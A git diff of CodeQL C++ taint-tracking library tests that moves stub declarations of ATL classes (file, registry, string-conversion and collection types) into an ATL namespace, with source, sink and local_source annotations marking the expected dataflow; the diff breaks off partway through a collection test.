size_t; -typedef struct _OVERLAPPED { - ULONG_PTR Internal; - ULONG_PTR InternalHigh; - union { - struct { - DWORD Offset; - DWORD OffsetHigh; - } DUMMYSTRUCTNAME; - PVOID Pointer; - } DUMMYUNIONNAME; - HANDLE hEvent; -} OVERLAPPED, *LPOVERLAPPED; - -using LPOVERLAPPED_COMPLETION_ROUTINE = void(DWORD, DWORD, LPOVERLAPPED); - -using HKEY = void*; - -class CAtlTransactionManager; - -class CHandle { - CHandle() throw(); - CHandle(CHandle& h) throw(); - explicit CHandle(HANDLE h) throw(); -}; - -struct CAtlFile : public CHandle { - CAtlFile() throw(); - CAtlFile(CAtlTransactionManager* pTM) throw(); - CAtlFile(CAtlFile& file) throw(); - explicit CAtlFile(HANDLE hFile) throw(); - - HRESULT Create( - LPCTSTR szFilename, - DWORD dwDesiredAccess, - DWORD dwShareMode, - DWORD dwCreationDisposition, - DWORD dwFlagsAndAttributes, - LPSECURITY_ATTRIBUTES lpsa, - HANDLE hTemplateFile) throw(); +namespace ATL { + + typedef ULONG REGSAM; + typedef DWORD SECURITY_INFORMATION, *PSECURITY_INFORMATION; + typedef PVOID PSECURITY_DESCRIPTOR; + typedef struct _GUID { + unsigned long Data1; + unsigned short Data2; + unsigned short Data3; + unsigned char Data4[8]; + } GUID; + typedef GUID* REFGUID; + + typedef struct _SECURITY_ATTRIBUTES { + DWORD nLength; + LPVOID lpSecurityDescriptor; + BOOL bInheritHandle; + } SECURITY_ATTRIBUTES, *PSECURITY_ATTRIBUTES, *LPSECURITY_ATTRIBUTES; + + typedef struct _FILETIME { + DWORD dwLowDateTime; + DWORD dwHighDateTime; + } FILETIME, *PFILETIME, *LPFILETIME; + + typedef struct _OVERLAPPED { + ULONG_PTR Internal; + ULONG_PTR InternalHigh; + union { + struct { + DWORD Offset; + DWORD OffsetHigh; + } DUMMYSTRUCTNAME; + PVOID Pointer; + } DUMMYUNIONNAME; + HANDLE hEvent; + } OVERLAPPED, *LPOVERLAPPED; + + using LPOVERLAPPED_COMPLETION_ROUTINE = void(DWORD, DWORD, LPOVERLAPPED); + + using HKEY = void*; + + class CAtlTransactionManager; + + class CHandle { + CHandle() throw(); + CHandle(CHandle& h) throw(); + explicit CHandle(HANDLE h) throw(); + }; + + struct CAtlFile : public CHandle { + CAtlFile() throw(); + CAtlFile(CAtlTransactionManager* pTM) throw(); + CAtlFile(CAtlFile& file) throw(); + explicit CAtlFile(HANDLE hFile) throw(); + + HRESULT Create( + LPCTSTR szFilename, + DWORD dwDesiredAccess, + DWORD dwShareMode, + DWORD dwCreationDisposition, + DWORD dwFlagsAndAttributes, + LPSECURITY_ATTRIBUTES lpsa, + HANDLE hTemplateFile) throw(); + + HRESULT Flush() throw(); + HRESULT GetOverlappedResult( + LPOVERLAPPED pOverlapped, + DWORD& dwBytesTransferred, + BOOL bWait + ) throw(); + + HRESULT GetPosition(ULONGLONG& nPos) const throw(); + HRESULT GetSize(ULONGLONG& nLen) const throw(); + HRESULT LockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); + + HRESULT Read( + LPVOID pBuffer, + DWORD nBufSize) throw(); + HRESULT Read( + LPVOID pBuffer, + DWORD nBufSize, + DWORD& nBytesRead) throw(); + HRESULT Read( + LPVOID pBuffer, + DWORD nBufSize, + LPOVERLAPPED pOverlapped) throw(); + HRESULT Read( + LPVOID pBuffer, + DWORD nBufSize, + LPOVERLAPPED pOverlapped, + LPOVERLAPPED_COMPLETION_ROUTINE pfnCompletionRoutine) throw(); + + HRESULT Seek( + LONGLONG nOffset, + DWORD dwFrom) throw(); + + HRESULT SetSize(ULONGLONG nNewLen) throw(); + HRESULT UnlockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); + HRESULT Write( + LPCVOID pBuffer, + DWORD nBufSize, + LPOVERLAPPED pOverlapped, + LPOVERLAPPED_COMPLETION_ROUTINE pfnCompletionRoutine) throw(); + + HRESULT Write( + LPCVOID pBuffer, + DWORD nBufSize, + DWORD* pnBytesWritten) throw(); + + HRESULT Write( + LPCVOID pBuffer, + DWORD nBufSize, + LPOVERLAPPED pOverlapped) throw(); + }; + + void test_CAtlFile() { + CAtlFile catFile; + char buffer[1024]; + catFile.Read(buffer, 1024); // $ local_source + } + + struct CAtlFileMappingBase { + CAtlFileMappingBase(CAtlFileMappingBase& orig); + CAtlFileMappingBase() throw(); + ~CAtlFileMappingBase() throw(); + + HRESULT CopyFrom(CAtlFileMappingBase& orig) throw(); + void* GetData() const throw(); + HANDLE GetHandle() throw (); + SIZE_T GetMappingSize() throw(); + + HRESULT MapFile( + HANDLE hFile, + SIZE_T nMappingSize, + ULONGLONG nOffset, + DWORD dwMappingProtection, + DWORD dwViewDesiredAccess) throw(); + + HRESULT MapSharedMem( + SIZE_T nMappingSize, + LPCTSTR szName, + BOOL* pbAlreadyExisted, + LPSECURITY_ATTRIBUTES lpsa, + DWORD dwMappingProtection, + DWORD dwViewDesiredAccess) throw(); + + HRESULT OpenMapping( + LPCTSTR szName, + SIZE_T nMappingSize, + ULONGLONG nOffset, + DWORD dwViewDesiredAccess) throw(); + + HRESULT Unmap() throw(); + }; + + template + struct CAtlFileMapping : public CAtlFileMappingBase { + operator T*() const throw(); + }; + + void test_CAtlFileMapping(CAtlFileMapping mapping) { + char* data = static_cast(mapping); // $ local_source + void* data2 = mapping.GetData(); // $ local_source + } + + struct CAtlTemporaryFile { + CAtlTemporaryFile() throw(); + ~CAtlTemporaryFile() throw(); + HRESULT Close(LPCTSTR szNewName) throw(); + HRESULT Create(LPCTSTR pszDir, DWORD dwDesiredAccess) throw(); HRESULT Flush() throw(); - HRESULT GetOverlappedResult( - LPOVERLAPPED pOverlapped, - DWORD& dwBytesTransferred, - BOOL bWait - ) throw(); - HRESULT GetPosition(ULONGLONG& nPos) const throw(); HRESULT GetSize(ULONGLONG& nLen) const throw(); + HRESULT HandsOff() throw(); + HRESULT HandsOn() throw(); HRESULT LockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); - + HRESULT Read( - LPVOID pBuffer, - DWORD nBufSize) throw(); + LPVOID pBuffer, + DWORD nBufSize, + DWORD& nBytesRead) throw(); + HRESULT Seek(LONGLONG nOffset, DWORD dwFrom) throw(); + + HRESULT SetSize(ULONGLONG nNewLen) throw(); + LPCTSTR TempFileName() throw(); + HRESULT UnlockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); + + HRESULT Write( + LPCVOID pBuffer, + DWORD nBufSize, + DWORD* pnBytesWritten) throw(); + operator HANDLE() throw(); + }; + + void test_CAtlTemporaryFile() { + CAtlTemporaryFile file; + char buffer[1024]; + DWORD bytesRead; + file.Read(buffer, 1024, bytesRead); // $ local_source + } + + struct CRegKey { + CRegKey() throw(); + CRegKey(CRegKey& key) throw(); + explicit CRegKey(HKEY hKey) throw(); + CRegKey(CAtlTransactionManager* pTM) throw(); + + ~CRegKey() throw(); + void Attach(HKEY hKey) throw(); + LONG Close() throw(); + + LONG Create( + HKEY hKeyParent, + LPCTSTR lpszKeyName, + LPTSTR lpszClass, + DWORD dwOptions, + REGSAM samDesired, + LPSECURITY_ATTRIBUTES lpSecAttr, + LPDWORD lpdwDisposition) throw(); + + LONG DeleteSubKey(LPCTSTR lpszSubKey) throw(); + LONG DeleteValue(LPCTSTR lpszValue) throw(); + HKEY Detach() throw(); + + LONG EnumKey( + DWORD iIndex, + LPTSTR pszName, + LPDWORD pnNameLength, + FILETIME* pftLastWriteTime) throw(); + + LONG Flush() throw(); - HRESULT Read( - LPVOID pBuffer, - DWORD nBufSize, - DWORD& nBytesRead) throw(); - HRESULT Read( - LPVOID pBuffer, - DWORD nBufSize, - LPOVERLAPPED pOverlapped) throw(); - HRESULT Read( - LPVOID pBuffer, - DWORD nBufSize, - LPOVERLAPPED pOverlapped, - LPOVERLAPPED_COMPLETION_ROUTINE pfnCompletionRoutine) throw(); - - HRESULT Seek( - LONGLONG nOffset, - DWORD dwFrom) throw(); - - HRESULT SetSize(ULONGLONG nNewLen) throw(); - HRESULT UnlockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); - HRESULT Write( - LPCVOID pBuffer, - DWORD nBufSize, - LPOVERLAPPED pOverlapped, - LPOVERLAPPED_COMPLETION_ROUTINE pfnCompletionRoutine) throw(); - - HRESULT Write( - LPCVOID pBuffer, - DWORD nBufSize, - DWORD* pnBytesWritten) throw(); - - HRESULT Write( - LPCVOID pBuffer, - DWORD nBufSize, - LPOVERLAPPED pOverlapped) throw(); -}; - -void test_CAtlFile() { - CAtlFile catFile; - char buffer[1024]; - catFile.Read(buffer, 1024); // $ local_source -} - -struct CAtlFileMappingBase { - CAtlFileMappingBase(CAtlFileMappingBase& orig); - CAtlFileMappingBase() throw(); - ~CAtlFileMappingBase() throw(); - - HRESULT CopyFrom(CAtlFileMappingBase& orig) throw(); - void* GetData() const throw(); - HANDLE GetHandle() throw (); - SIZE_T GetMappingSize() throw(); - - HRESULT MapFile( - HANDLE hFile, - SIZE_T nMappingSize, - ULONGLONG nOffset, - DWORD dwMappingProtection, - DWORD dwViewDesiredAccess) throw(); - - HRESULT MapSharedMem( - SIZE_T nMappingSize, - LPCTSTR szName, - BOOL* pbAlreadyExisted, - LPSECURITY_ATTRIBUTES lpsa, - DWORD dwMappingProtection, - DWORD dwViewDesiredAccess) throw(); - - HRESULT OpenMapping( - LPCTSTR szName, - SIZE_T nMappingSize, - ULONGLONG nOffset, - DWORD dwViewDesiredAccess) throw(); - - HRESULT Unmap() throw(); -}; - -template -struct CAtlFileMapping : public CAtlFileMappingBase { - operator T*() const throw(); -}; - -void test_CAtlFileMapping(CAtlFileMapping mapping) { - char* data = static_cast(mapping); // $ local_source - void* data2 = mapping.GetData(); // $ local_source -} - -struct CAtlTemporaryFile { - CAtlTemporaryFile() throw(); - ~CAtlTemporaryFile() throw(); - HRESULT Close(LPCTSTR szNewName) throw(); - HRESULT Create(LPCTSTR pszDir, DWORD dwDesiredAccess) throw(); - HRESULT Flush() throw(); - HRESULT GetPosition(ULONGLONG& nPos) const throw(); - HRESULT GetSize(ULONGLONG& nLen) const throw(); - HRESULT HandsOff() throw(); - HRESULT HandsOn() throw(); - HRESULT LockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); - - HRESULT Read( - LPVOID pBuffer, - DWORD nBufSize, - DWORD& nBytesRead) throw(); - HRESULT Seek(LONGLONG nOffset, DWORD dwFrom) throw(); - - HRESULT SetSize(ULONGLONG nNewLen) throw(); - LPCTSTR TempFileName() throw(); - HRESULT UnlockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); - - HRESULT Write( - LPCVOID pBuffer, - DWORD nBufSize, - DWORD* pnBytesWritten) throw(); - operator HANDLE() throw(); -}; - -void test_CAtlTemporaryFile() { - CAtlTemporaryFile file; - char buffer[1024]; - DWORD bytesRead; - file.Read(buffer, 1024, bytesRead); // $ local_source -} - -struct CRegKey { - CRegKey() throw(); - CRegKey(CRegKey& key) throw(); - explicit CRegKey(HKEY hKey) throw(); - CRegKey(CAtlTransactionManager* pTM) throw(); - - ~CRegKey() throw(); - void Attach(HKEY hKey) throw(); - LONG Close() throw(); - - LONG Create( - HKEY hKeyParent, - LPCTSTR lpszKeyName, - LPTSTR lpszClass, - DWORD dwOptions, - REGSAM samDesired, - LPSECURITY_ATTRIBUTES lpSecAttr, - LPDWORD lpdwDisposition) throw(); - - LONG DeleteSubKey(LPCTSTR lpszSubKey) throw(); - LONG DeleteValue(LPCTSTR lpszValue) throw(); - HKEY Detach() throw(); - - LONG EnumKey( - DWORD iIndex, - LPTSTR pszName, - LPDWORD pnNameLength, - FILETIME* pftLastWriteTime) throw(); - - LONG Flush() throw(); - - LONG GetKeySecurity( - SECURITY_INFORMATION si, - PSECURITY_DESCRIPTOR psd, - LPDWORD pnBytes) throw(); - - LONG NotifyChangeKeyValue( - BOOL bWatchSubtree, - DWORD dwNotifyFilter, - HANDLE hEvent, - BOOL bAsync) throw(); - - LONG Open( - HKEY hKeyParent, - LPCTSTR lpszKeyName, - REGSAM samDesired) throw(); - - LONG QueryBinaryValue( - LPCTSTR pszValueName, - void* pValue, - ULONG* pnBytes) throw(); - - LONG QueryDWORDValue( - LPCTSTR pszValueName, - DWORD& dwValue) throw(); - - LONG QueryGUIDValue( - LPCTSTR pszValueName, - GUID& guidValue) throw(); - - LONG QueryMultiStringValue( - LPCTSTR pszValueName, - LPTSTR pszValue, - ULONG* pnChars) throw(); - - LONG QueryQWORDValue( - LPCTSTR pszValueName, - ULONGLONG& qwValue) throw(); - - LONG QueryStringValue( - LPCTSTR pszValueName, - LPTSTR pszValue, - ULONG* pnChars) throw(); - - LONG QueryValue( + LONG GetKeySecurity( + SECURITY_INFORMATION si, + PSECURITY_DESCRIPTOR psd, + LPDWORD pnBytes) throw(); + + LONG NotifyChangeKeyValue( + BOOL bWatchSubtree, + DWORD dwNotifyFilter, + HANDLE hEvent, + BOOL bAsync) throw(); + + LONG Open( + HKEY hKeyParent, + LPCTSTR lpszKeyName, + REGSAM samDesired) throw(); + + LONG QueryBinaryValue( LPCTSTR pszValueName, - DWORD* pdwType, - void* pData, + void* pValue, ULONG* pnBytes) throw(); - LONG QueryValue( - DWORD& dwValue, - LPCTSTR lpszValueName); - - LONG QueryValue( - LPTSTR szValue, - LPCTSTR lpszValueName, - DWORD* pdwCount); - - LONG RecurseDeleteKey(LPCTSTR lpszKey) throw(); - - LONG SetBinaryValue( - LPCTSTR pszValueName, - const void* pValue, - ULONG nBytes) throw(); - - LONG SetDWORDValue(LPCTSTR pszValueName, DWORD dwValue) throw(); - - LONG SetGUIDValue(LPCTSTR pszValueName, REFGUID guidValue) throw(); - - LONG SetKeySecurity(SECURITY_INFORMATION si, PSECURITY_DESCRIPTOR psd) throw(); - - LONG SetKeyValue( - LPCTSTR lpszKeyName, - LPCTSTR lpszValue, - LPCTSTR lpszValueName) throw(); - - LONG SetMultiStringValue(LPCTSTR pszValueName, LPCTSTR pszValue) throw(); - - LONG SetQWORDValue(LPCTSTR pszValueName, ULONGLONG qwValue) throw(); - - LONG SetStringValue( - LPCTSTR pszValueName, - LPCTSTR pszValue, - DWORD dwType) throw(); - - LONG SetValue( - LPCTSTR pszValueName, - DWORD dwType, - const void* pValue, - ULONG nBytes) throw(); - - static LONG SetValue( - HKEY hKeyParent, - LPCTSTR lpszKeyName, - LPCTSTR lpszValue, - LPCTSTR lpszValueName); - - LONG SetValue( - DWORD dwValue, - LPCTSTR lpszValueName); - - LONG SetValue( - LPCTSTR lpszValue, - LPCTSTR lpszValueName, - bool bMulti, - int nValueLen); - - operator HKEY() const throw(); - CRegKey& operator= (CRegKey& key) throw(); - - HKEY m_hKey; -}; - -void test_CRegKey() { - CRegKey key; - char data[1024]; - ULONG bytesRead; - key.QueryBinaryValue("foo", data, &bytesRead); // $ local_source - - DWORD value; - key.QueryDWORDValue("foo", value); // $ local_source - - GUID guid; - key.QueryGUIDValue("foo", guid); // $ local_source - - key.QueryMultiStringValue("foo", data, &bytesRead); // $ local_source - - ULONGLONG qword; - key.QueryQWORDValue("foo", qword); // $ local_source - - key.QueryStringValue("foo", data, &bytesRead); // $ local_source - - key.QueryValue(data, "foo", &bytesRead); // $ local_source - - DWORD type; - key.QueryValue("foo", &type, data, &bytesRead); // $ local_source - - DWORD value2; - key.QueryValue(value2, "foo"); // $ local_source + LONG QueryDWORDValue( + LPCTSTR pszValueName, + DWORD& dwValue) throw(); + + LONG QueryGUIDValue( + LPCTSTR pszValueName, + GUID& guidValue) throw(); + + LONG QueryMultiStringValue( + LPCTSTR pszValueName, + LPTSTR pszValue, + ULONG* pnChars) throw(); + + LONG QueryQWORDValue( + LPCTSTR pszValueName, + ULONGLONG& qwValue) throw(); + + LONG QueryStringValue( + LPCTSTR pszValueName, + LPTSTR pszValue, + ULONG* pnChars) throw(); + + LONG QueryValue( + LPCTSTR pszValueName, + DWORD* pdwType, + void* pData, + ULONG* pnBytes) throw(); + + LONG QueryValue( + DWORD& dwValue, + LPCTSTR lpszValueName); + + LONG QueryValue( + LPTSTR szValue, + LPCTSTR lpszValueName, + DWORD* pdwCount); + + LONG RecurseDeleteKey(LPCTSTR lpszKey) throw(); + + LONG SetBinaryValue( + LPCTSTR pszValueName, + const void* pValue, + ULONG nBytes) throw(); + + LONG SetDWORDValue(LPCTSTR pszValueName, DWORD dwValue) throw(); + + LONG SetGUIDValue(LPCTSTR pszValueName, REFGUID guidValue) throw(); + + LONG SetKeySecurity(SECURITY_INFORMATION si, PSECURITY_DESCRIPTOR psd) throw(); + + LONG SetKeyValue( + LPCTSTR lpszKeyName, + LPCTSTR lpszValue, + LPCTSTR lpszValueName) throw(); + + LONG SetMultiStringValue(LPCTSTR pszValueName, LPCTSTR pszValue) throw(); + + LONG SetQWORDValue(LPCTSTR pszValueName, ULONGLONG qwValue) throw(); + + LONG SetStringValue( + LPCTSTR pszValueName, + LPCTSTR pszValue, + DWORD dwType) throw(); + + LONG SetValue( + LPCTSTR pszValueName, + DWORD dwType, + const void* pValue, + ULONG nBytes) throw(); + + static LONG SetValue( + HKEY hKeyParent, + LPCTSTR lpszKeyName, + LPCTSTR lpszValue, + LPCTSTR lpszValueName); + + LONG SetValue( + DWORD dwValue, + LPCTSTR lpszValueName); + + LONG SetValue( + LPCTSTR lpszValue, + LPCTSTR lpszValueName, + bool bMulti, + int nValueLen); + + operator HKEY() const throw(); + CRegKey& operator= (CRegKey& key) throw(); + + HKEY m_hKey; + }; + + void test_CRegKey() { + CRegKey key; + char data[1024]; + ULONG bytesRead; + key.QueryBinaryValue("foo", data, &bytesRead); // $ local_source + + DWORD value; + key.QueryDWORDValue("foo", value); // $ local_source + + GUID guid; + key.QueryGUIDValue("foo", guid); // $ local_source + + key.QueryMultiStringValue("foo", data, &bytesRead); // $ local_source + + ULONGLONG qword; + key.QueryQWORDValue("foo", qword); // $ local_source + + key.QueryStringValue("foo", data, &bytesRead); // $ local_source + + key.QueryValue(data, "foo", &bytesRead); // $ local_source + + DWORD type; + key.QueryValue("foo", &type, data, &bytesRead); // $ local_source + + DWORD value2; + key.QueryValue(value2, "foo"); // $ local_source + } } \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 167ba84301fd..e26416a0e68c 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -30,1213 +30,1215 @@ struct __POSITION { int unused; }; typedef __POSITION* POSITION; typedef WORD ATL_URL_PORT; -enum ATL_URL_SCHEME{ - ATL_URL_SCHEME_UNKNOWN = -1, - ATL_URL_SCHEME_FTP = 0, - ATL_URL_SCHEME_GOPHER = 1, - ATL_URL_SCHEME_HTTP = 2, - ATL_URL_SCHEME_HTTPS = 3, - ATL_URL_SCHEME_FILE = 4, - ATL_URL_SCHEME_NEWS = 5, - ATL_URL_SCHEME_MAILTO = 6, - ATL_URL_SCHEME_SOCKS = 7 -}; - using HINSTANCE = void*; using size_t = decltype(sizeof(int)); using SIZE_T = size_t; #define NULL nullptr -typedef struct tagSAFEARRAYBOUND { - ULONG cElements; - LONG lLbound; -} SAFEARRAYBOUND, *LPSAFEARRAYBOUND; - -typedef struct tagVARIANT { - /* ... */ -} VARIANT; - -typedef struct tagSAFEARRAY { - USHORT cDims; - USHORT fFeatures; - ULONG cbElements; - ULONG cLocks; - PVOID pvData; - SAFEARRAYBOUND rgsabound[1]; -} SAFEARRAY, *LPSAFEARRAY; - -struct _U_STRINGorID { - _U_STRINGorID(UINT nID); - _U_STRINGorID(LPCTSTR lpString); - - LPCTSTR m_lpstr; -}; - -void test__U_STRINGorID() { - { - UINT x = source(); - _U_STRINGorID u(x); - sink(u.m_lpstr); // $ ir - } +namespace ATL { + enum ATL_URL_SCHEME{ + ATL_URL_SCHEME_UNKNOWN = -1, + ATL_URL_SCHEME_FTP = 0, + ATL_URL_SCHEME_GOPHER = 1, + ATL_URL_SCHEME_HTTP = 2, + ATL_URL_SCHEME_HTTPS = 3, + ATL_URL_SCHEME_FILE = 4, + ATL_URL_SCHEME_NEWS = 5, + ATL_URL_SCHEME_MAILTO = 6, + ATL_URL_SCHEME_SOCKS = 7 + }; + + typedef struct tagSAFEARRAYBOUND { + ULONG cElements; + LONG lLbound; + } SAFEARRAYBOUND, *LPSAFEARRAYBOUND; + + typedef struct tagVARIANT { + /* ... */ + } VARIANT; + + typedef struct tagSAFEARRAY { + USHORT cDims; + USHORT fFeatures; + ULONG cbElements; + ULONG cLocks; + PVOID pvData; + SAFEARRAYBOUND rgsabound[1]; + } SAFEARRAY, *LPSAFEARRAY; + + struct _U_STRINGorID { + _U_STRINGorID(UINT nID); + _U_STRINGorID(LPCTSTR lpString); + + LPCTSTR m_lpstr; + }; + + void test__U_STRINGorID() { + { + UINT x = source(); + _U_STRINGorID u(x); + sink(u.m_lpstr); // $ ir + } - { - LPCTSTR y = indirect_source(); - _U_STRINGorID u(y); - sink(u.m_lpstr); // $ ir + { + LPCTSTR y = indirect_source(); + _U_STRINGorID u(y); + sink(u.m_lpstr); // $ ir + } } -} -template -struct CA2AEX { - LPSTR m_psz; - char m_szBuffer[t_nBufferLength]; + template + struct CA2AEX { + LPSTR m_psz; + char m_szBuffer[t_nBufferLength]; - CA2AEX(LPCSTR psz, UINT nCodePage); - CA2AEX(LPCSTR psz); + CA2AEX(LPCSTR psz, UINT nCodePage); + CA2AEX(LPCSTR psz); - ~CA2AEX(); + ~CA2AEX(); - operator LPSTR() const throw(); -}; + operator LPSTR() const throw(); + }; -void test_CA2AEX() { - { - LPSTR x = indirect_source(); - CA2AEX<128> a(x); - sink(static_cast(a)); // $ ir - sink(a.m_psz); // $ ir - sink(a.m_szBuffer); // $ ir - } - - { - LPSTR x = indirect_source(); - CA2AEX<128> a(x, 0); - sink(static_cast(a)); // $ ir - sink(a.m_psz); // $ ir - sink(a.m_szBuffer); // $ ir - } -} + void test_CA2AEX() { + { + LPSTR x = indirect_source(); + CA2AEX<128> a(x); + sink(static_cast(a)); // $ ir + sink(a.m_psz); // $ ir + sink(a.m_szBuffer); // $ ir + } -template -struct CA2CAEX { - CA2CAEX(LPCSTR psz, UINT nCodePage) ; - CA2CAEX(LPCSTR psz) ; - ~CA2CAEX() throw(); - operator LPCSTR() const throw(); - LPCSTR m_psz; -}; - -void test_CA2CAEX() { - LPCSTR x = indirect_source(); - { - CA2CAEX<128> a(x); - sink(static_cast(a)); // $ ir - sink(a.m_psz); // $ ir - sink(a.m_psz); // $ ir - } - { - CA2CAEX<128> a(x, 0); - sink(static_cast(a)); // $ ir - sink(a.m_psz); // $ ir - sink(a.m_psz); // $ ir + { + LPSTR x = indirect_source(); + CA2AEX<128> a(x, 0); + sink(static_cast(a)); // $ ir + sink(a.m_psz); // $ ir + sink(a.m_szBuffer); // $ ir + } } -} -template -struct CA2WEX { - CA2WEX(LPCSTR psz, UINT nCodePage) ; - CA2WEX(LPCSTR psz) ; - ~CA2WEX() throw(); - operator LPWSTR() const throw(); - LPWSTR m_psz; - wchar_t m_szBuffer[t_nBufferLength]; -}; - -void test_CA2WEX() { - LPCSTR x = indirect_source(); - { - CA2WEX<128> a(x); - sink(static_cast(a)); // $ ir - sink(a.m_psz); // $ ir - sink(a.m_psz); // $ ir - } - { - CA2WEX<128> a(x, 0); - sink(static_cast(a)); // $ ir - sink(a.m_psz); // $ ir - sink(a.m_psz); // $ ir + template + struct CA2CAEX { + CA2CAEX(LPCSTR psz, UINT nCodePage) ; + CA2CAEX(LPCSTR psz) ; + ~CA2CAEX() throw(); + operator LPCSTR() const throw(); + LPCSTR m_psz; + }; + + void test_CA2CAEX() { + LPCSTR x = indirect_source(); + { + CA2CAEX<128> a(x); + sink(static_cast(a)); // $ ir + sink(a.m_psz); // $ ir + sink(a.m_psz); // $ ir + } + { + CA2CAEX<128> a(x, 0); + sink(static_cast(a)); // $ ir + sink(a.m_psz); // $ ir + sink(a.m_psz); // $ ir + } } -} -template -struct CElementTraitsBase { - typedef const T& INARGTYPE; - typedef T& OUTARGTYPE; - - static void CopyElements(T* pDest, const T* pSrc, size_t nElements); - static void RelocateElements(T* pDest, T* pSrc, size_t nElements); -}; - -template -struct CDefaultElementTraits : public CElementTraitsBase {}; - -template -struct CElementTraits : public CDefaultElementTraits {}; - -template> -struct CAtlArray { - using INARGTYPE = typename ETraits::INARGTYPE; - using OUTARGTYPE = typename ETraits::OUTARGTYPE; - - CAtlArray() throw(); - ~CAtlArray() throw(); - - size_t Add(INARGTYPE element); - size_t Add(); - size_t Append(const CAtlArray& aSrc); - void Copy(const CAtlArray& aSrc); - const E& GetAt(size_t iElement) const throw(); - E& GetAt(size_t iElement) throw(); - size_t GetCount() const throw(); - E* GetData() throw(); - const E* GetData() const throw(); - void InsertArrayAt(size_t iStart, const CAtlArray* paNew); - void InsertAt(size_t iElement, INARGTYPE element, size_t nCount); - bool IsEmpty() const throw(); - void RemoveAll() throw(); - void RemoveAt(size_t iElement, size_t nCount); - void SetAt(size_t iElement, INARGTYPE element); - void SetAtGrow(size_t iElement, INARGTYPE element); - bool SetCount(size_t nNewSize, int nGrowBy); - E& operator[](size_t ielement) throw(); - const E& operator[](size_t ielement) const throw(); -}; - -void test_CAtlArray() { - int x = source(); - - { - CAtlArray a; - a.Add(x); - sink(a[0]); // $ ir - a.Add(0); - sink(a[0]); // $ ir - - CAtlArray a2; - sink(a2[0]); - a2.Append(a); - sink(a2[0]); // $ ir - - CAtlArray a3; - sink(a3[0]); - a3.Copy(a2); - sink(a3[0]); // $ ir - - sink(a3.GetAt(0)); // $ ir - sink(*a3.GetData()); // $ ir - - CAtlArray a4; - sink(a4.GetAt(0)); - a4.InsertArrayAt(0, &a3); - sink(a4.GetAt(0)); // $ ir - } - { - CAtlArray a5; - a5.InsertAt(0, source(), 1); - sink(a5[0]); // $ ir - - CAtlArray a6; - a6.SetAtGrow(0, source()); - sink(a6[0]); // $ ir + template + struct CA2WEX { + CA2WEX(LPCSTR psz, UINT nCodePage) ; + CA2WEX(LPCSTR psz) ; + ~CA2WEX() throw(); + operator LPWSTR() const throw(); + LPWSTR m_psz; + wchar_t m_szBuffer[t_nBufferLength]; + }; + + void test_CA2WEX() { + LPCSTR x = indirect_source(); + { + CA2WEX<128> a(x); + sink(static_cast(a)); // $ ir + sink(a.m_psz); // $ ir + sink(a.m_psz); // $ ir + } + { + CA2WEX<128> a(x, 0); + sink(static_cast(a)); // $ ir + sink(a.m_psz); // $ ir + sink(a.m_psz); // $ ir + } } -} -template> -struct CAtlList { - using INARGTYPE = typename ETraits::INARGTYPE; - CAtlList(UINT nBlockSize) throw(); - ~CAtlList() throw(); - POSITION AddHead(); - POSITION AddHead(INARGTYPE element); - void AddHeadList(const CAtlList* plNew); - POSITION AddTail(); - POSITION AddTail(INARGTYPE element); - void AddTailList(const CAtlList* plNew); - POSITION Find(INARGTYPE element, POSITION posStartAfter) const throw(); - POSITION FindIndex(size_t iElement) const throw(); - E& GetAt(POSITION pos) throw(); - const E& GetAt(POSITION pos) const throw(); - size_t GetCount() const throw(); - E& GetHead() throw(); - const E& GetHead() const throw(); - POSITION GetHeadPosition() const throw(); - E& GetNext(POSITION& pos) throw(); - const E& GetNext(POSITION& pos) const throw(); - E& GetPrev(POSITION& pos) throw(); - const E& GetPrev(POSITION& pos) const throw(); - E& GetTail() throw(); - const E& GetTail() const throw(); - POSITION GetTailPosition() const throw(); - POSITION InsertAfter(POSITION pos, INARGTYPE element); - POSITION InsertBefore(POSITION pos, INARGTYPE element); - bool IsEmpty() const throw(); - void MoveToHead(POSITION pos) throw(); - void MoveToTail(POSITION pos) throw(); - void RemoveAll() throw(); - void RemoveAt(POSITION pos) throw(); - E RemoveHead(); - void RemoveHeadNoReturn() throw(); - E RemoveTail(); - void RemoveTailNoReturn() throw(); - void SetAt(POSITION pos, INARGTYPE element); - void SwapElements(POSITION pos1, POSITION pos2) throw(); -}; - -void test_CAtlList() { - int x = source(); - { - CAtlList list(10); - sink(list.GetHead()); - list.AddHead(x); - sink(list.GetHead()); // $ ir - - CAtlList list2(10); - list2.AddHeadList(&list); - sink(list2.GetHead()); // $ ir - - CAtlList list3(10); - list3.AddTail(x); - sink(list3.GetHead()); // $ ir - - CAtlList list4(10); - list4.AddTailList(&list3); - sink(list4.GetHead()); // $ ir + template + struct CElementTraitsBase { + typedef const T& INARGTYPE; + typedef T& OUTARGTYPE; + + static void CopyElements(T* pDest, const T* pSrc, size_t nElements); + static void RelocateElements(T* pDest, T* pSrc, size_t nElements); + }; + + template + struct CDefaultElementTraits : public CElementTraitsBase {}; + + template + struct CElementTraits : public CDefaultElementTraits {}; + + template> + struct CAtlArray { + using INARGTYPE = typename ETraits::INARGTYPE; + using OUTARGTYPE = typename ETraits::OUTARGTYPE; + + CAtlArray() throw(); + ~CAtlArray() throw(); + + size_t Add(INARGTYPE element); + size_t Add(); + size_t Append(const CAtlArray& aSrc); + void Copy(const CAtlArray& aSrc); + const E& GetAt(size_t iElement) const throw(); + E& GetAt(size_t iElement) throw(); + size_t GetCount() const throw(); + E* GetData() throw(); + const E* GetData() const throw(); + void InsertArrayAt(size_t iStart, const CAtlArray* paNew); + void InsertAt(size_t iElement, INARGTYPE element, size_t nCount); + bool IsEmpty() const throw(); + void RemoveAll() throw(); + void RemoveAt(size_t iElement, size_t nCount); + void SetAt(size_t iElement, INARGTYPE element); + void SetAtGrow(size_t iElement, INARGTYPE element); + bool SetCount(size_t nNewSize, int nGrowBy); + E& operator[](size_t ielement) throw(); + const E& operator[](size_t ielement) const throw(); + }; + + void test_CAtlArray() { + int x = source(); { - CAtlList list5(10); - auto pos = 